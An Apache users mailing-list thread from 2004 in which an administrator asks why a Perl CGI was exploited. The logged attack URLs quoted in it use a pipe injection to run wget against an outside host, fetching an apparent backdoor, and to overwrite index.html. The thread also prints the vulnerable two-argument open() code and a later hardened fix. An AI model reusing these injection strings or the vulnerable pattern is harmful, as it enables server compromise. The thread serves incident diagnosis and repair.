From: Murthy Ambaru
To: users@httpd.apache.org, Bruce@Ivn.cl
Date: Sun, 5 Dec 2004 13:31:49 -0800 (PST)
Subject: Re: [users@httpd] Security Problem
Message-ID: <20041205213149.32948.qmail@web60504.mail.yahoo.com>
In-Reply-To: <41B38935.4090201@Ivn.cl>
Mailing-List: users@httpd.apache.org

Thanks Dick and Ivan for the input.... Well, the programmer who worked on this is no longer here. So would it be sufficient if I just check in parseForm whether the input file has any kind of weird characters (such as %, |, wget etc.) and, if it does, redirect it somewhere else? Or should I check if the file exists on the system? I thought of doing this initially, but I could not reproduce what the hacker did by using the same command. I wanted to reproduce it and then correct the script and retest it again so as to be sure that it is fixed.
Also, this is not on Linux (it's Windows), so what should I do to check that the system is not already compromised.... thanks a lot

"Ivan Barrera A." <Bruce@Ivn.cl> wrote:
As I see it, you take the parameter file from the URL without parsing it
(as Dick explained in the other post too)

my $data_file =
"/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing
additional cmds without even noticing. (the pipe is really dangerous)

As Dick said... ask your programmer to fix this right up. (And try to
examine your machine.. it may already be compromised.. if on Red Hat, run
rpm -VVV procps net-tools util-linux rpm ; if nothing comes up, you're good)



Murthy Ambaru wrote:
> Thanks for the explanation. So the file can be downloaded to the /tmp/bind
> directory on the server executing that script. As I said, I tried typing
> in the URL used and got nothing. I did not check /tmp/bind though (I
> did not find that in the interface that I use to manage files on the
> server). So what would be a secure way of opening the file?
> The script is in Perl. I am adding it below. Can you see anything weird
> in it?? Thanks...
>
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file =
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
> if ($line =~ /endimage/) { $print = 1 ; }
> if ($print eq "1") {
> print $line;
> }
> }
>
> ########################################################
> sub parseForm {
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $FORM{$name} = $value;
> }
> }
>
>
> "Ivan Barrera A." wrote:
>
> I mean, the cgi script (which I don't know anything about) seems to
> "open" a file referred to by ?file= ... Probably an insecure way of "opening"
> the file leads to executing the rest of the statement.
>
> Look :
>
> ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
>
> After the correct page, a pipe, and wget http://blabla/bind -O/tmp/bind
> is appended. So, if the script executes this, the command wget will
> exec, and download that file into /tmp/bind.
> After that, using the same technique, you can exec anything you
> want. So the problem is the way of opening (or doing something else to) the
> files in the cgi script.
> Is it a C, Perl, PHP, or any other language script?
>
> Murthy Ambaru wrote:
> > Thanks for the response Ivan. I am sorry, I really did not
> > understand what you mean by "download the file to /tmp/bind". When the printer
> > friendly link is clicked, this is the URL that will be accessed:
> > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > Of course it depends on the page being clicked. So the file
> > name will be passed as a parameter to the CGI file. I included the CGI code
> > in my earlier mail, could you please take a look.
> > Thanks,
> > Murthy
> >
> > "Ivan Barrera A." wrote:
> >
> > The URL you entered downloads the file bind to /tmp/bind. It's
> > probably an IRC bot or a backdoor.
> > If someone did that, the version of the cgi script is insecure and
> > should be revised.
> >
> > I'm sorry if I didn't clarify enough, but it would be useful to see
> > that cgi.
> >
> > Murthy Ambaru wrote:
> > > I have a question regarding security. There is a web site that
> > > has a printer friendly version of web pages being displayed using a CGI
> > > script. Apparently when this was in use, the site was hacked and
> > > some unwanted stuff posted on the site. I had a look at the access.log
> > > when this occurred and this was what showed up (I just replaced the
> > > site name with xyz, everything else is the same):
> > >
> > > /images/newswireprint.gif HTTP/1.0" 304 - "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> > >
> > > GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|
> > >
> > > Can anyone understand how they are able to hack? I tried
> > > reproducing it by typing in the above URL used by the hackers, but could get nothing
> > > out of it. The permissions on all the html docs folders are set to 755.
> > >
> > > Below is the CGI file being used. It basically strips images off.
> > > Can anyone help with this problem? What should I be looking at to
> > > plug the security holes.... Thanks a lot
> > >
> > > -Murthy
> > >
> > >
> > >
> > > #!/usr/local/bin/perl
> > >
> > > print "Content-type: text/html\n\n";
> > >
> > > &parseForm;
> > >
> > > open(HEADER,"printheader.html") ;
> > > my @HEADER = <HEADER>;
> > > close(HEADER);
> > > #print it! Put a # before print if you don't want a header printed...
> > > print "@HEADER";
> > >
> > > my $data_file =
> > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > >
> > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > my @FILE = <FILE>;
> > > close(FILE);
> > >
> > > $print = 1 ;
> > >
> > > foreach $line(@FILE) {
> > >
> > > if ($line =~ /beginimage/) {
> > > print $line ;
> > > $print = 0;
> > > next ;
> > > }
> > >
> > > if ($line =~ /endimage/) { $print = 1 ; }
> > >
> > > if ($print eq "1") {
> > > print $line;
> > > }
> > >
> > > }
> > >
> > >
> > > ########################################################
> > >
> > > sub parseForm {
> > >
> > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > }
> > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > >
> > >
> > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > >
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $buffer);
> > > }
> > > foreach $pair (@pairs) {
> > > ($name, $value) = split(/=/, $pair);
> > >
> > > # Un-Webify plus signs and %-encoding
> > > $value =~ tr/+/ /;
> > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > >
> > > $FORM{$name} = $value;
> > > }
> > >
> > > }
>
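
As an added example (not code from this thread or from the script's author), the open() call Ivan points at can be replaced so the file parameter is never interpreted as a pipe or command, and is also confined to the scriptfiles directory; it assumes the same directory as the script above, a $FORM{file} value already decoded by parseForm, Unix-style paths, and the helper name open_scriptfile is invented here.

```perl
#!/usr/bin/perl
# Added example (not the script from the thread): a safe replacement for
# the open() line Ivan singles out. Assumes the same scriptfiles directory
# and a $FORM{file} value already decoded by parseForm; Unix-style paths.
use strict;
use warnings;
use File::Spec;
use Cwd qw(abs_path);

my $BASE = '/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles';

# The thread's original two-argument open, for comparison only. Perl reads
# the mode from the string itself, so a value that ends in '|' makes open()
# run the text before it as a shell command instead of reading a file:
#   open(FILE, "$BASE/$FORM{file}") or die "Can't open";

sub open_scriptfile {
    my ($base, $name) = @_;

    # 1. Allowlist the characters a page name may contain. Everything else
    #    (pipes, quotes, spaces, percent signs...) is rejected up front; this
    #    is simpler and safer than hunting for known-bad strings like 'wget'.
    return (undef, 'bad characters in file name')
        unless defined $name && $name =~ m{\A[A-Za-z0-9_./-]+\z};

    # 2. Refuse any '..' component so the name cannot climb out of $base.
    return (undef, 'path traversal rejected')
        if grep { $_ eq '..' } File::Spec->splitdir($name);

    # 3. Resolve symlinks and confirm the real file still lives under $base.
    my $real_base = abs_path($base);
    my $real      = abs_path(File::Spec->catfile($base, $name));
    return (undef, 'not found') unless defined $real && -f $real;
    return (undef, 'outside scriptfiles directory')
        unless defined $real_base && index($real, "$real_base/") == 0;

    # 4. Three-argument open with an explicit '<' mode: the third argument is
    #    only ever a file name, never a pipe or command, whatever it contains.
    open(my $fh, '<', $real) or return (undef, "Can't open: $!");
    return ($fh, undef);
}

# In the CGI, this replaces the original open/readline pair:
#   my ($fh, $err) = open_scriptfile($BASE, $FORM{file});
#   die "Can't open" unless $fh;
#   my @FILE = <$fh>;
#   close($fh);
```

The three-argument open alone stops the pipe trick from the access log; steps 1 to 3 are the "is the file really valid" check Ivan asks for, and they also cover names that point outside the directory.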

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org